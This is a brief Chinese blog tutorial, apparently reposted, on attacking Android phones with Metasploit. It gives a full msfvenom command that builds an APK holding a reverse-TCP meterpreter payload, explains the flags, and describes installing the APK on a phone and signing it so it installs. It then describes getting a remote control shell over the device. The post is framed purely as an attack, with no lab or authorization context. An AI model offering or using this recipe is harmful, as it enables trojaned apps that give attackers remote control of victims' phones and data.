利用Metasploit攻击Android

Posted wjvzbr

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了利用Metasploit攻击Android相关的知识,希望对你有一定的参考价值。

首先我在Kali下生成一个android的应用程序,即apk格式的文件,用到的命令是:

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk

注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来;’

           LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口;

           -R:表示要生成的文件类型;

           > /root/rb.apk:表示生成文件的保存路径;

那么接下来就开始配置:

攻击端配置成功之后在手机端将之前生成好的apk文件导入手机中,然后供给端就开始exploit,则可以看出回话的连接状态:

选择连接会话,进入控制shell,则可以查看使得内容信息与版本信息:

注意:在将Kali里面生成的apk文件直接导入手机时可能会发生错误,那是因为apk文件缺少授权,所以我们下载一个制作签名的软件,给此文件进行授权,则就可以导入了

以上是关于利用Metasploit攻击Android的主要内容,如果未能解决你的问题,请参考以下文章

怎样更新metasploit中的模块

Metasploit 笔记

内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射

Metasploit渗透测试实验报告

Metasploit渗透测试(框架介绍靶机安装基本使用方法)

Kali使用Metasploit内外网渗透windows系统